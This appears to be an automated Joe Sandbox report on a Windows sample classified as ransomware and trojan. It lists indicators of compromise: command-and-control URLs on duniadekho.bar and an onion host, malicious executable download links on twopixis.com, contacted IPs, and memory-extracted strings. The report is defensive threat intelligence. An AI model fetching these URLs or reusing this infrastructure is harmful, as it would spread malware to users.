        https://server5.duniadekho.bar/api/poll100%Avira URL Cloudmalware
        https://twopixis.com/wupxarch-6162-dcb505dc2b9d8aac05f4ca0727f5eadb.exe100%Avira URL Cloudmalware
        https://server5.duniadekho.bar/api/restriction-us100%Avira URL Cloudmalware
        https://twopixis.com/smbscanlocal-1bf850b4d9587c1017a75a47680584c4.exe100%Avira URL Cloudmalware
        https://api.sec-tunnel.com/v4/subscriber_logininconsistent0%Avira URL Cloudsafe
        https://twopixis.com/gm-305-7507ffc9a340f774985cb5ca11ca78c4.exe100%Avira URL Cloudmalware
        http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion100%Avira URL Cloudmalware
        https://api.sec-tunnel.com/v4/discoverhttps://api.sec-tunnel.com/v4/geo_listindex0%Avira URL Cloudsafe
        https://twopixis.com/watchdog/watchdog.exeSETCONF100%Avira URL Cloudmalware
        https://duniadekho.barhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionCommonPro0%Avira URL Cloudsafe
        https://duniadekho.barMicrosoft0%Avira URL Cloudsafe
        https://objects.githubusercontent.com/github-production-release-asset-2e65be/350494541/0257ea00-a8530%Avira URL Cloudsafe
        https://api.sec-tunnel.com/v4/register_subscriber0%Avira URL Cloudsafe
        https://api.sec-tunnel.com/v4/register_device0%Avira URL Cloudsafe
        https://1.1.1.1/dns-query0%Avira URL Cloudsafe
        http://https://_bad_pdb_file.pdb0%Avira URL Cloudsafe
        http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://server5.vcr4vuv40%Avira URL Cloudsafe
        https://server5.duniadekho.bar100%Avira URL Cloudmalware
        https://server5.duniadekho.bar/api/cdn?c=50d7801a966ceaa4&uuid=ec87b504-92ea-4d22-a937-161700799581100%Avira URL Cloudmalware
        https://api.sec-tunnel.com/v4/device_generate_passwordinternal0%Avira URL Cloudsafe
        https://blockchain.infoindex0%Avira URL Cloudsafe
        https://server5.duniadekho.bar/api/signature/100%Avira URL Cloudmalware
        https://api.sec-tunnel.com/v4/discover0%Avira URL Cloudsafe
        http://www.avantbrowser.com)MOT-V9mm/00.620%Avira URL Cloudsafe
        https://server5.duniadekho.barH0%Avira URL Cloudsafe
        http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion100%Avira URL Cloudmalware
        http://www.xmlspy.com)0%Avira URL Cloudsafe
        https://twopixis.com/watchdog/watchdog.exeno-store100%Avira URL Cloudmalware
        http://localhost:3433/https://duniadekho.baridna:0%Avira URL Cloudsafe
        https://duniadekho.barTransfer-Encodingtworkpoll0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        stun4.l.google.com
        		74.125.204.127
        		truefalse
          		high
          twopixis.com
          		172.67.168.112
          		truefalse
            		high
            server5.duniadekho.bar
            		185.82.216.50
            		truefalse
              		high
              github.com
              		140.82.121.3
              		truefalse
                		high
                stun.stunprotocol.org
                		127.0.0.1
                		truefalse
                  		high
                  cdn.discordapp.com
                  		162.159.134.233
                  		truefalse
                    		high
                    api.sec-tunnel.com
                    		77.111.247.15
                    		truefalse
                      		high
                      objects.githubusercontent.com
                      		185.199.110.133
                      		truefalse
                        		high
                        ec87b504-92ea-4d22-a937-161700799581.uuid.duniadekho.bar
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://cdn.discordapp.com/attachments/1087398815188910163/1087399133926674453/LZ.zipfalse
                            		high
                            https://server5.duniadekho.bar/api/signature/21f67ca2e1b8b0405399c65a0e0d031etrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exefalse
                              		high
                              https://twopixis.com/w/w-8-debug.exefalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://twopixis.com/watchdog/watchdog.exefalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://server5.duniadekho.bar/api/polltrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://twopixis.com/wupxarch-6162-dcb505dc2b9d8aac05f4ca0727f5eadb.exefalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://server5.duniadekho.bar/api/restriction-ustrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://twopixis.com/smbscanlocal-1bf850b4d9587c1017a75a47680584c4.exefalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://twopixis.com/gm-305-7507ffc9a340f774985cb5ca11ca78c4.exefalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://api.sec-tunnel.com/v4/register_subscriberfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://api.sec-tunnel.com/v4/register_devicefalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://server5.duniadekho.bar/api/cdn?c=50d7801a966ceaa4&uuid=ec87b504-92ea-4d22-a937-161700799581true
                              • Avira URL Cloud: malware
                              		unknown
                              https://api.sec-tunnel.com/v4/discoverfalse
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313dcsrss.exe, 00000014.00000003.213018868802.000000000C4AC000.00000004.00001000.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://github.comcsrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                https://duniadekho.barSETCONFcsrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://invalidlog.txtlookupkdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollxennHbdeCkATuZcsrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://server5.duniadekho.bararch=64-bit&build_number=19042&Intel%28R%29csrss.exe, 00000014.00000003.210659083983.000000000C7FC000.00000004.00001000.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		low
                                https://github.comWcsrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionserver5.vcr4vuv4sf5233bcsrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown
                                https://duniadekho.barcsrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC:csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown
                                https://server5.duniadekho.bar/api/restriction-usH2csrss.exe, 00000014.00000003.210659966591.000000000C7BE000.00000004.00001000.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://devlog.gregarius.net/docs/ua)LinkskdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollcsrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://github.com/ameshkov/dnslookup/csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211820907766.000000000CE1E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210616640622.000000000D764000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  https://twopixis.com/watchdogcsrss.exe, 00000014.00000003.213017406273.000000000C52C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210668268821.000000000C5AC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209403091208.000000000C5C4000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213015280823.000000000C5AC000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollnnHbdeCkATuZNPcsrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://turnitin.com/robot/crawlerinfo.html)cannotkdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    http://search.msn.com/msnbot.htm)net/http:kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.sec-tunnel.com/v4/subscriber_logininconsistentcsrss.exe, 00000014.00000003.210616758241.000000000D754000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211821043822.000000000CE0E000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000035.00000002.209188988689.00000000709CD000.00000020.00000001.01000000.00000010.sdmpfalse
                                        		high
                                        http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onioncsrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://search.msn.com/msnbot.htm)msnbot/1.1kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.sec-tunnel.com/v4/discoverhttps://api.sec-tunnel.com/v4/geo_listindexcsrss.exe, 00000014.00000003.211821043822.000000000CE0E000.00000004.00001000.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://twopixis.com/watchdog/watchdog.exeSETCONFcsrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://duniadekho.barhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionCommonProcsrss.exe, 00000014.00000003.210671361655.000000000C4E4000.00000004.00001000.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://duniadekho.barMicrosoftcsrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            https://objects.githubusercontent.com/github-production-release-asset-2e65be/350494541/0257ea00-a853csrss.exe, 00000014.00000003.210653294128.000000000C950000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210671924295.000000000C4BC000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://1.1.1.1/dns-querycsrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211820907766.000000000CE1E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210616640622.000000000D764000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://https://_bad_pdb_file.pdbkdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            https://www.cloudflare.com/5xx-error-landingcsrss.exe, 00000014.00000003.213015103821.000000000C5F2000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213019914167.000000000C460000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211840953641.000000000C45E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209403091208.000000000C5F0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209393805620.000000000C6D8000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210667163276.000000000C5EE000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213017192448.000000000C544000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.cloudflare.com/5xx-errorcsrss.exe, 00000014.00000003.209403091208.000000000C5F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://server5.vcr4vuv4csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.zlib.net/csrss.exefalse
                                                  		high
                                                  https://server5.duniadekho.barcsrss.exe, 00000014.00000003.210653914185.000000000C90E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.google.com/feedfetcher.html)HKLMkdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.zlib.net/Dcsrss.exe, 00000014.00000003.210662530760.000000000C6C6000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210662422652.000000000C6D6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.sec-tunnel.com/v4/device_generate_passwordinternalcsrss.exe, 00000014.00000003.210616758241.000000000D754000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211820907766.000000000CE1E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000035.00000002.209188988689.00000000709CD000.00000020.00000001.01000000.00000010.sdmpfalse
                                                        		high
                                                        https://blockchain.infoindexcsrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://server5.duniadekho.bar/api/signature/csrss.exe, 00000014.00000003.209395939200.000000000C624000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.avantbrowser.com)MOT-V9mm/00.62kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		low
                                                        https://server5.duniadekho.barHcsrss.exe, 00000014.00000003.210658786957.000000000C805000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onioncsrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.xmlspy.com)powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		low
                                                        https://twopixis.com/watchdog/watchdog.exeno-storecsrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://localhost:3433/https://duniadekho.baridna:kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        		low
                                                        http://search.msn.com/msnbot.htm)pkcs7:kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duniadekho.barTransfer-Encodingtworkpollcsrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          172.67.168.112
                                                          		twopixis.comUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          77.68.94.106
                                                          		unknownUnited Kingdom
                                                          		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                          140.82.121.3
                                                          		github.comUnited States
                                                          		36459GITHUBUSfalse
                                                          62.210.99.238
                                                          		unknownFrance
                                                          		12876OnlineSASFRfalse
                                                          185.82.216.50
                                                          		server5.duniadekho.barBulgaria
                                                          		59729ITL-BGfalse
                                                          147.135.65.26
                                                          		unknownUnited States
                                                          		16276OVHFRfalse
                                                          74.125.204.127
                                                          		stun4.l.google.comUnited States
                                                          		15169GOOGLEUSfalse
                                                          51.159.136.111
                                                          		unknownFrance
                                                          		12876OnlineSASFRfalse
                                                          158.69.205.247
                                                          		unknownCanada
                                                          		16276OVHFRfalse
                                                          104.21.54.103
                                                          		unknownUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          77.111.247.15
                                                          		api.sec-tunnel.comNorway
                                                          		205016HERNLABSNLfalse
                                                          185.199.110.133
                                                          		objects.githubusercontent.comNetherlands
                                                          		54113FASTLYUSfalse
                                                          77.111.247.137
                                                          		unknownNorway
                                                          		205016HERNLABSNLfalse
                                                          162.159.134.233
                                                          		cdn.discordapp.comUnited States
                                                          		13335CLOUDFLARENETUSfalse

                                                          Private

                                                          IP
                                                          127.0.0.1

                                                          General Information

                                                          Joe Sandbox Version:37.1.0 Beryl
                                                          Analysis ID:877005
                                                          Start date and time:2023-05-28 11:28:20 +02:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 21m 24s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                          Number of analysed new started processes analysed:85
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample file name:kdsyitkxmS.exe
                                                          Detection:MAL
                                                          Classification:mal100.rans.troj.evad.winEXE@111/94@10/15
                                                          EGA Information:Failed
                                                          HDC Information:
                                                          • Successful, ratio: 100% (good quality ratio 48%)
                                                          • Quality average: 40.1%
                                                          • Quality standard deviation: 44.2%
                                                          HCA Information:Failed
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 20.93.58.141
                                                          • Excluded domains from analysis (whitelisted): wd-prod-cp-eu-north-3-fe.northeurope.cloudapp.azure.com, spclient.wg.spotify.com, wdcpalt.microsoft.com, array611.prod.do.dsp.mp.microsoft.com, tile-service.weather.microsoft.com, array604.prod.do.dsp.mp.microsoft.com, ctldl.windowsupdate.com, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, disc601.prod.do.dsp.mp.microsoft.com
                                                          • Execution Graph export aborted for target csrss.exe, PID 2532 because there are no executed function
